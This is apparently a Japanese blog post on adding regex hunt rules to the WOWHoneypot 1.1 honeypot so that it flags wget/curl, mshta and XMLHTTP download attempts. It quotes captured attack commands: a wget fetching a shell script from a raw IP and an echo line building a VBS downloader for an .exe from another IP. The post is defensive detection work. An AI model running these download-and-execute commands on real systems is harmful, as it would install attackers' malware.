WOWHoneypot Version 1.1が公開されました。
ハンティング機能が追加されましたが、少し設定を追加したいと思います。
GWが終わり、勉強の日々が始まる。
huntrules.txtの設定追加
正規表現で記載されています。
正規表現を知らないで見たら、呪文のようなコードです。
残念ながら、ここでは正規表現とは何ぞ?は解説しません。
wgetとcurl系
ファイル取得系を見ていると、以下のように「http://」を含めずにいらっしゃることがあります。
wget -O /tmp/.XO-lock 188.166.148.89:53/a.sh
この場合、huntrules.txtに記載されている正規表現では取得ができませんので、もう少しバッファ持たせて、以下の設定を追加しました。
追加設定.1
wget.+\d[\w/:\.\-]+
curl.+\d[\w/:\.\-]+
この場合、「User-Agent: curl/7.35.0」も該当しますが、そこは確認時に消すようにします。
mshta
トレンドマイクロの記事にあるように、mshtaはWindowsに標準搭載されている正規のシステムファイルで、指定のサイトへアクセスさせることが出来ます。
huntrules.txtに含まれていませんでしたので、これも追加します。
追加設定.2
mshta.+https?://[\w/:\.\-]+
XMLHTTP
MicrosoftのXML DOM(Document Object Model)コンポーネントスイートに、XMLHTTPオブジェクトがあります。参考
これを使い、ファイルを取得してくるパターンもありました。
echoでリダイレクトし、悪性ファイルを作成し、そのファイルをcscript.exe で実行させる。
こんなの.
echo objXMLHTTP.open "GET","http://198.50.179.109:8020/taskhostxz.exe",false >> C:/Windows/temp/getpocc.vbs
追加設定.3
objXMLHTTP.+https?://[\w/:\.\-]+
終わりに
もっといろんなパターンのファイル取得方法があると思います。
ハニーポッターの人、もっと教えて!